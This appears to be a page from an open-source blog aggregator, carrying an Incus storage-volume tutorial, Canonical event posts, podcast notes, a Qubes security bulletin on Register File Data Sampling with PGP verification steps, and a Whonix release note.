We will be creating storage volumes for each web server from the Incus storage pool, then use incus storage volume attach to attach those volumes to both the corresponding web server container and the Web developer’s container.
Creating the web server container webserver1
First we create the web server container, webserver1, and install the web server package. By default, the nginx web server creates a directory html inside /var/www/ for the default website. In a later step we will attach there the storage volume that stores the files for this web server.
$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$
Creating the Web developer’s container webdev
Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP; use incus config device add to create a proxy device that gives your Web developer access. Here, we create a WEBDEV directory in the home directory of the default debian user account of this container. In the next step, we will attach each web server’s separate storage volume inside it.
$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$
When you launch an Incus container, you automatically get a single storage volume for the files of that container. Here we treat ourselves to an extra storage volume for the web data. But first, let’s learn a bit about storage, storage pools and storage volumes.
We run incus storage list to get a list of the storage pools of our installation. In this case, the storage pool is called default (NAME), we are using ZFS for storage (DRIVER), and the ZFS pool (SOURCE) is called default as well. For the last part, you can run zpool list to verify the ZFS pool details. The USED BY count of 89 in this example can be verified from the output of zfs list.
$ incus storage list
+---------+--------+---------+-------------+---------+---------+
| NAME | DRIVER | SOURCE | DESCRIPTION | USED BY | STATE |
+---------+--------+---------+-------------+---------+---------+
| default | zfs | default | | 89 | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
default 512G 136.9G 375.1G - - 8% 18% 1.00x ONLINE -
$
We run incus storage volume list to get a list of the storage volumes in Incus. I am not showing the output here because it is big. The first column is the type of the storage volume: container, one per system container; image, for each cached image from a remote like images.linuxcontainers.org; virtual-machine, for each virtual machine; or custom, for those created by ourselves, as we are going to do in a moment. The fourth column is the content type of a storage volume, which can be either filesystem or block. The default when creating storage volumes is filesystem, and that is what we will be creating in a bit.
Creating the webdata1 storage volume
Now we are ready to create the webdata1 storage volume. Within the incus storage volume functionality, we use the create command to create the webdata1 storage volume, of type filesystem, on the default storage pool.
$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$
Attaching the webdata1 storage volume to the web server container
Now we can attach the webdata1 storage volume to the webserver1 container. Within the incus storage volume functionality, we use the attach command to attach the webdata1 storage volume from the default storage pool to the webserver1 container, mounting it over the /var/www/html/ path.
$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$
Attaching the webdata1 storage volume to the webdev container
Now we can attach the webdata1 storage volume to the webdev container. Within the incus storage volume functionality, we use the attach command to attach the webdata1 storage volume from the default storage pool to the webdev container, mounting it over the /home/debian/WEBDEV/webserver1 path.
$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$
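With several web servers, the create-and-attach steps above repeat once per server. A sketch that only prints the whole sequence, assuming the default pool and the webserverN/webdataN naming scheme used in this post:

```shell
# Generate the per-server create/attach commands from the steps above.
# Printed rather than executed so you can review them first; assumes
# the "default" pool and the webserverN/webdataN naming of this post.
for i in 1 2 3; do
  printf 'incus storage volume create default webdata%s --type=filesystem\n' "$i"
  printf 'incus storage volume attach default webdata%s webserver%s /var/www/html/\n' "$i" "$i"
  printf 'incus storage volume attach default webdata%s webdev /home/debian/WEBDEV/webserver%s\n' "$i" "$i"
done
```

Piping the output into sh (after reviewing it) would perform the actual creation and attachment on a live Incus installation.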
Setting up the web files for webserver1
We have attached the storage volume to both the web server container and the web development container. Let’s set up the initial permissions and create a simple hello-world HTML file. We get a shell into the web development container webdev and observe that the storage volume has been mounted. The default permissions are drwx--x--x and we change them to drwxr-xr-x, so that the contents of the directory can be listed. Then, we change the owner:group to debian:debian in order to give the Web developer full access when they edit the files.
$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$
Still in the webdev container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html file.
debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
<head>
<title>Welcome to Incus</title>
<meta charset="utf-8" />
</head>
<style>
body {
background: rgb(2,0,36);
background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
}
h1,p {
color: white;
text-align: center;
}
</style>
<body>
<h1>Welcome to Incus</h1>
<p>The web development data of this web server are stored in an Incus storage volume. </p>
<p>This storage volume is attached to both the web server container and a web development container. </p>
</body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$
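If you script this step instead of typing it interactively, a quoted heredoc avoids the Ctrl+d keystroke entirely. A minimal sketch, writing into a temporary directory here for illustration; inside the webdev container you would cd to ~/WEBDEV/webserver1 instead:

```shell
# Non-interactive alternative to `cat > index.html` + Ctrl+d: a quoted
# heredoc. Writes into a temporary directory for illustration; in the
# webdev container you would run this inside ~/WEBDEV/webserver1.
workdir=$(mktemp -d)
cat > "$workdir/index.html" <<'EOF'
<!DOCTYPE HTML>
<html>
<head><title>Welcome to Incus</title><meta charset="utf-8" /></head>
<body><h1>Welcome to Incus</h1></body>
</html>
EOF
grep -c '<title>' "$workdir/index.html"   # -> 1
```

The quoted EOF delimiter keeps the HTML verbatim (no shell expansion), which matters if your page ever contains $ or backticks.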
We visit the web server using our browser. The IP address of the web server is obtained as follows.
$ incus list webserver1 -c n4
+------------+--------------------+
| NAME | IPV4 |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$
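For scripting, the table output above is awkward to parse; assuming incus supports CSV formatting via a -f csv flag, extracting the bare address could look like the sketch below (a captured sample line stands in for the live command so the sketch runs anywhere):

```shell
# Extract the bare IPv4 address from `incus list webserver1 -c n4 -f csv`
# style output. The -f csv flag is an assumption; the sample line below
# stands in for the live command so the sketch runs without Incus.
sample='webserver1,10.10.10.88 (eth0)'
ip=$(printf '%s\n' "$sample" | awk -F, '{ sub(/ .*/, "", $2); print $2 }')
echo "$ip"   # -> 10.10.10.88
```

The awk call takes the second comma-separated field and strips the trailing interface name, leaving only the address for use in scripts.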
This is the HTML page we created.
We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer, so that they get access to the files, and only the files, from a central location, the webdev container.
An additional task would be to set up git in the webdev container so that any changes to the web files are tracked.
You can also detach storage volumes (not shown here).
You would use incus config device to create a proxy device to give external access to the Web developer, preferably over SSH/SFTP instead of plain FTP. In fact, in terms of usability there is no difference between the two, so please use SFTP. All web development tools should support SFTP.
Canonical is delighted to be a technology partner at the Data Innovation Summit (DIS) in 2024. We are proud to showcase our Data and AI solutions through our conference talk and technology in practice sessions. The event will take place in Kistamässan, Stockholm on April 24-25, 2024. Visit us at booth C71 to learn how open source data and AI solutions can help you take your models to production, from edge to cloud.
The modern enterprise can use AI algorithms and models to learn from their treasure troves of big data, and make predictions or decisions based on the data without being explicitly programmed to do so. What’s more, the AI models grow more accurate over time.
The magic is in the melding of AI and big data. Data of incredible volume, velocity, and variety is fed into the AI engine, making the AI smarter. Over time, less human intervention is needed for the AI to run properly; in time, the AI can deliver deeper insights—and strategic value—from the ever-increasing pools of data, often in real time.
In today’s competitive business environment, your AI and data strategies need to be more interconnected than ever. According to an MIT Technology Review survey, 78% of CIOs say that scaling AI to create business value is the top priority of their enterprise data strategy, and 96% of AI leaders agree. Nearly three out of four CIOs also say that data challenges are the biggest factor jeopardising AI success.
The Data Innovation Summit is a significant event in the field of Data and AI, especially in the Nordics. It brings together professionals, enterprise practitioners, technology providers, start-up innovators, and academics working with data and AI. We at Canonical are delighted to announce that we will be participating in this event and sharing our expertise in Data and AI.
Canonical is a well-known publisher of Ubuntu, which is the preferred operating system (OS) for data scientists. In addition to the OS, Canonical offers an integrated data and AI stack. We provide the most cost-effective options to help you gain control over your Total Cost of Ownership (TCO), and ensure reliable security maintenance, allowing you to innovate at a faster pace.
Canonical Data and AI Product Managers Andreea Munteanu and Michelle Anne Tabirao will be speaking about open source for your DataOps and MLOps.
Talk description
Open source data and AI tools enable organisations to create a comprehensive solution that covers all stages of the data and machine learning lifecycle. This includes correlating data from various sources, regardless of their collection engine, and serving the model in production. Together, DataOps and MLOps drive the collaboration, communication, and integration that great data and AI teams need, making them essential to the model lifecycle. DataOps is an approach to data management that focuses on collaboration, communication, and integration among data engineers, data scientists, and other data-related roles to improve the efficiency and effectiveness of data processes. MLOps is a set of practices that combines machine learning, software development, and operations to enable the deployment, monitoring, and maintenance of machine learning models in production environments.
In this talk, we will explore how to build an end-to-end solution for DataOps and MLOps using open-source solutions like databases and ML and analytics tools such as OpenSearch, Kubeflow, and MLflow. Professionals can focus on building ML models without spending time on tooling and operational work. We will highlight some use cases, e.g. in the telco sector, where MLOps and DataOps are used to optimise the telco network infrastructure and reduce power consumption.
Attendees will learn about the critical factors to consider when selecting tools and best practices needed for building a robust, production-grade ML project.
If you are interested in building or scaling your data and AI projects with open source solutions, we are here to help you. Visit our Data and AI offerings to explore our solutions.
14 March, 2024 02:32AM by aida
"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.
Já sabem: oiçam, subscrevam e partilhem!
Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.
Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.
Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]
The post Purism Differentiator Series, Part 7: Freedoms appeared first on Purism.
13 March, 2024 05:36PM by Todd Weaver
I attended a session titled “AI and Privacy” yesterday and was under the impression that the discussion was going to be about AI as a threat to privacy. Although the panel addressed that subject somewhat, the discussion seemed to be more focused on how an alarm company partnered with Google protects their alarm […]
The post SXSW 2024 Day 5- AI And Privacy In The News, So I Thought? appeared first on Purism.
13 March, 2024 05:35PM by Rex M. Lee
13 March, 2024 09:39AM by aida
The Xen Project has released one or more Xen security advisories (XSAs). The security of Qubes OS is affected.
The following XSAs do affect the security of Qubes OS:
The following XSAs do not affect the security of Qubes OS, and no user action is necessary:
Qubes OS uses the Xen hypervisor as part of its architecture. When the Xen Project publicly discloses a vulnerability in the Xen hypervisor, they issue a notice called a Xen security advisory (XSA). Vulnerabilities in the Xen hypervisor sometimes have security implications for Qubes OS. When they do, we issue a notice called a Qubes security bulletin (QSB). (QSBs are also issued for non-Xen vulnerabilities.) However, QSBs can provide only positive confirmation that certain XSAs do affect the security of Qubes OS. QSBs cannot provide negative confirmation that other XSAs do not affect the security of Qubes OS. Therefore, we also maintain an XSA tracker, which is a comprehensive list of all XSAs publicly disclosed to date, including whether each one affects the security of Qubes OS. When new XSAs are published, we add them to the XSA tracker and publish a notice like this one in order to inform Qubes users that a new batch of XSAs has been released and whether each one affects the security of Qubes OS.
In conjunction with 3mdeb, the sixth edition of our Qubes OS Summit will be held live this year from September 20 to 22 in Berlin, Germany! For more information about this event, please see: https://vpub.dasharo.com/e/16/qubes-os-summit-2024
If you would like to submit a proposal, the Call for Participation (CFP) is open until August 5: https://cfp.3mdeb.com/qubes-os-summit-2024/cfp
Note: A newer version of this QSB has been published. See Update for QSB-101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982).
We have published Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452). The text of this QSB and its accompanying cryptographic signatures are reproduced below. For an explanation of this announcement and instructions for authenticating this QSB, please see the end of this announcement.
---===[ Qubes Security Bulletin 101 ]===---
2024-03-12
Register File Data Sampling (XSA-452)
User action
------------
Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.
Summary
--------
On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:
| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.
For more details, see [4].
Impact
-------
An attacker might be able to infer the contents of data held previously
in floating point, vector, and/or integer register files on the same
core, including data from a more privileged context.
Affected systems
-----------------
At present, RFDS is known to affect only certain Atom cores from Intel.
Other Intel CPUs and CPUs from other hardware vendors are not known to
be affected.
RFDS affects Atom cores between the Goldmont and Gracemont
microarchitectures. This includes Alder Lake and Raptor Lake hybrid
client systems that have a mix of Gracemont and other types of cores.
Patching
---------
The following packages contain security updates that address the
vulnerabilities described in this bulletin:
For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1
For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1
These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]
Dom0 must be restarted afterward in order for the updates to take
effect.
If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.
Credits
--------
See the original Xen Security Advisory.
References
-----------
[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
--
The Qubes Security Team
https://www.qubes-os.org/security/
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEELRdx/k12ftx2sIn61lWk8hgw4GoFAmXxsFQACgkQ1lWk8hgw
4GptDhAAm63FkT4jC++iZbU8JWgVtR2YEwIDRTKeYV6qerfFSr3QJxIu4OVesfwS
d0YOXDKmu3S0mbOIqcOk9BGkh1zSTbm3wQTkzPlnKdv7TOzS0GrRAmH6a6YCBoxC
UkpnRiQI8i5ABeYG4nDKg2Tv7qY76/cGsshnh4ntuXllV0TekwTjE89qHwcy9p5T
g0v7Jir6Wk+SBmAmxNatnfipdAiX/zlXdvHusCjRjbfdqh0e1/1Ho47nUj0GtRZV
fwXBZkG1QlxffEoTbwa6K9D3EMY6RdH9O/Z80DM7mD6UT/TTwZ1LlJ4gvk/Q/kjF
6Lsc7EEbgdi9oPsO69GJiUxYLFKXpmdH3KbqLGcHPzVluh93FJl0TpKEyINCB+xE
bUSWi5SZZXWmnmlrttef+S6K8vyYxdYmZq8uhG7Qzxt5EVlnWxTu2FFHrFNO0gB8
wBaqscABiGJ8VCXgVi8rgwdXOIThethXNSlptpu419l747w07DygSGEPkgKkSzt1
UqshFG9WM47o06UH/mGOrwSFYHwq1kA0m8s38wn0Qmw4V8wwnYq9bXA+ZO2QILIa
5B5yTEOCHpqqOCDAc+WopTiQFmJ9m5+dWYalSb2XcmPoIc21bHsYalWODFLr76Zv
Fj4Vxhb9Sp1DE3FfFpI78KG/4AZbv9nfwexy8Hpy6krRwzJxJSo=
=CgMr
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmXxqpEACgkQSsGN4REu
FJAAmg/+JqRz8x1gF0bjKNSr38FWI2FgNg/DkmWw3cYtRiInobZejlvLy9vvX1ZL
yFYn/e4E0YIbhralqzmxYvE/dJ7DZdLQdJHODwJVk3QJT/DLrK65PmbAFxnof+wk
URWsouaQ0AAwAdWQCnTnlBHaKM8o/bdmcV9WbuSuKb64zJf2ciIU3iOQHPyxPj2Q
Whu8tg2JQZq6TVsVd6JcnD73ckQlkE58j8nyJP6WF4z5JfYvnCyzcgqbqDqabzbh
YhZyC5X8pNg5BVkX25xvun0NBj/P5NxeC1rcVTHK3XdYB8bBmoS6GobPC7T3jpCe
TQ8E2DbuAi5+oWZnMj8v0kdtNjezzP/9iWLsm865W6dczCMWZeh/nAs4aM6L1rG6
T7FogCV5lE9cVx3RqCPZpzAY9uaN0WryIZ/dLrmFbZR8T54UKWscmfWlak4TvBCS
1i3F2O4NgnzttaV/JW13hT9BUCMxc5uzYP/sRzw6zWGtxvQoSO+p3KmaFuscEhdt
tLNR5FAcmkbUUXg1uMOrrhfy5jEyLHretUzId3T9WPy9pnazcKnd6zT4HB6J+5bf
LNmriCIgQZ1B7yG7312Cadrrq3ktJPVEzUwYwx7I+7j/wQfQvaii0Lr+WM1DZUxH
KN+9pNV/SJ0I2gd5ObcX0gf8uchc548A5fIw21Oq1WopXtNEm48=
=XY1y
-----END PGP SIGNATURE-----
The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.
A Qubes security bulletin (QSB) is a security announcement issued by the Qubes security team. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see Qubes security bulletins (QSBs).
QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by updating normally. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.
A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git and gpg installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg> indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from... followed by an appropriate key. The [full] indicates full trust, which this key inherits by virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify command should always start with gpg: Good signature from... followed by an appropriate key.
For this announcement (QSB-101), the commands are:
$ gpg --verify qsb-101-2024.txt.sig.marmarek qsb-101-2024.txt
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
Canonical, a leading advocate for open-source technology, is excited to announce its participation in the HPE Tech Jam 2024, set to take place in Atlanta and Vienna. This prestigious event will convene presales consultants and enterprise architects to delve into groundbreaking strategies powered by HPE’s edge-to-cloud workload solutions and products.
Canonical’s sponsorship of the Tech Jam event underscores its steadfast dedication to promoting open-source technology within the tech industry. This event serves as a prime opportunity for the company to showcase its innovative solutions, forge connections with like-minded professionals, and explore potential collaborations. Attendees can anticipate gaining invaluable insights into open-source solutions and their potential to drive business growth.
As a Silver sponsor of the event, Canonical will present its cutting-edge open-source solutions designed to foster innovation and cost savings for businesses. Visitors to Canonical’s booth can engage in interactive games demonstrating the significance of securing open-source applications.
Canonical’s participation in the event will offer attendees insights into various open-source solutions and their application in driving innovation and growth. Key highlights include:
Canonical’s presence at HPE Tech Jam underscores its unwavering commitment to promoting the adoption of open-source solutions in the tech industry. The event provides an ideal platform for Canonical to engage with industry professionals, spotlight its innovative products, and advocate for the benefits of open-source technology worldwide.
Canonical and HPE boast a longstanding partnership aimed at delivering comprehensive open-source solutions spanning infrastructure to cutting-edge, secure, cloud-native MLOps platforms. Together, they assist customers in achieving significant cost savings, optimizing operations, and enhancing performance while prioritizing top-notch security for both physical and virtual environments.
Canonical’s participation in HPE Tech Jam 2024 promises to be a milestone in advancing open-source technology and fostering collaboration within the tech community. Stay tuned for updates on Canonical’s innovative contributions at the event!
Download Whonix for VirtualBox:
This is a point release.
Alternatively, an in-place release upgrade is possible using the Whonix repository.
This release would not have been possible without the numerous supporters of Whonix!
Please Donate!
Please Contribute!
pulseaudio-qubes → pipewire-qubes: port from pulseaudio to pipewire for audio support - #17 by marmarek
https://github.com/Whonix/derivative-maker/compare/17.1.1.5-developers-only…17.1.3.1-developers-only
12 March, 2024 03:50PM by Patrick
